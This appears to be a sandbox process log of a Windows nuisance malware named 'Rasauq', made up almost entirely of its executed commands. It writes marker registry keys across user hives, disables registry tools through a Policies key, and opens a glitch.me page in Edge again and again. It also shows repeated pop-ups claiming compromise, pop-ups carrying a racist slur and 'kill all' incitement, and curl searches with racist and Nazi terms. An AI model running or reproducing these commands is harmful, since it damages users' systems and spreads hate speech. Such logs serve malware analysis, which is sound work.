reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKwN2EBJ1Cyr7HTF0\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKwN2EBJ1Cyr7HTF0\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-18\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "End of search: 26 match(es) found.\Software\Rasauq on top" /f

C:\Windows\system32\msg.exe

msg * /time:3 "This machine has been compromised by Rasuaq"

C:\Windows\system32\timeout.exe

timeout /t 3 /nobreak

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x25c,0x7ffb56a1f208,0x7ffb56a1f214,0x7ffb56a1f220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2212,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=2204 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1988,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=1980 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2540,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=2552 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3520,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=3572 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3540,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=3576 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4860,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=4856 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=5020,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=5180 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=5352,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=5368 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=5528,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=3636 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=5888,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=5880 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=6028,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=6024 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=6336,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=6288 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=6548,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=6576 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6832,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=6888 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6860,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=6948 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7284,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=7296 /prefetch:8

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --always-read-main-dll --field-trial-handle=7660,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=7668 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=8076,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=8116 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7432,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=7288 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7432,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=7288 /prefetch:8

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --always-read-main-dll --field-trial-handle=8500,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=8520 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --always-read-main-dll --field-trial-handle=7888,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=7872 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --always-read-main-dll --field-trial-handle=8280,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=8068 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=6140,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=7816 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=6588,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=5636 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=8804,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=8852 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=9028,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=9068 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=8988,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=9152 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=9428,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=9408 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

